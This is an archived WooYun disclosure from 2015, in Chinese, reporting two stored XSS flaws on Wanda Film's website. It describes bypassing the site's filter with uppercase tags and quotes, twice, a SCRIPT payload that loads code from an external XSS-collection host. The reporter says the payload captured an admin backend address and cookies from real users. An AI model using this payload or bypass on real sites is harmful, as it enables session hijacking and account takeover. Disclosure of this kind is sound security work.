漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-092646
漏洞标题:万达电影主站 两处xss(简单绕过防护,已获得后台管理和一些用户cookie)
相关厂商:大连万达集团股份有限公司
漏洞作者: answer
提交时间:2015-01-19 16:00
修复时间:2015-03-05 16:02
公开时间:2015-03-05 16:02
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-05: 细节向公众公开
简要描述:
rt
详细说明:
第一处 在电影评论的地方(评论需要用户登录)
随意贴一部电影的地址做测试:
http://www.wandafilm.com/baseInfo/film/filmIndex.do?m=film_info_init_next&filmId=20141229111046116265
经过测试:对<script> http等关键做了过滤,但是大写可以直接绕过,
于是插入代码
</p><SCRIPT src=HTTP://xss.hacktask.net/njgZKz?1421640813></SCRIPT><p>
坐等上钩:
后台地址 和cookie
用户cookie
第二处是在投诉建议
http://www.wandafilm.com/user/message_mgr.do?m=init
也是什么都没过虑,只是这个地方影响小 只能影响自己和 后台回复的人。。
这个地方什么都没过滤 可以插任何东西。。。。。
点开帮助中心
再点开投诉建议
点开之后就可以提交投诉和建议了。。。
我由于测试太多。。已经提交不起了。。。
这个地方能影响的范围稍小,cookie打到的也是自己的。。而且后台一直没人审核建议。。。所以危害效果就不一并贴出,但是要记得修复
漏洞证明:
第一处 在电影评论的地方(评论需要用户登录)
随意贴一部电影的地址做测试:
http://www.wandafilm.com/baseInfo/film/filmIndex.do?m=film_info_init_next&filmId=20141229111046116265
经过测试:对<script> http等关键做了过滤,但是大写可以直接绕过,
于是插入代码
</p><SCRIPT src=HTTP://xss.hacktask.net/njgZKz?1421640813></SCRIPT><p>
坐等上钩:
后台地址 和cookie
用户cookie
第二处是在投诉建议
http://www.wandafilm.com/user/message_mgr.do?m=init
也是什么都没过虑,只是这个地方影响小 只能影响自己和 后台回复的人。。
这个地方什么都没过滤 可以插任何东西。。。。。
点开帮助中心
再点开投诉建议
点开之后就可以提交投诉和建议了。。。
我由于测试太多。。已经提交不起了。。。
这个地方能影响的范围稍小,cookie打到的也是自己的。。而且后台一直没人审核建议。。。所以危害效果就不一并贴出,但是要记得修复
修复方案:
版权声明:转载请注明来源 answer@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-01-19 16:07
厂商回复:
感谢answer同学的关注与贡献!马上通知业务部门整改!
最新状态:
暂无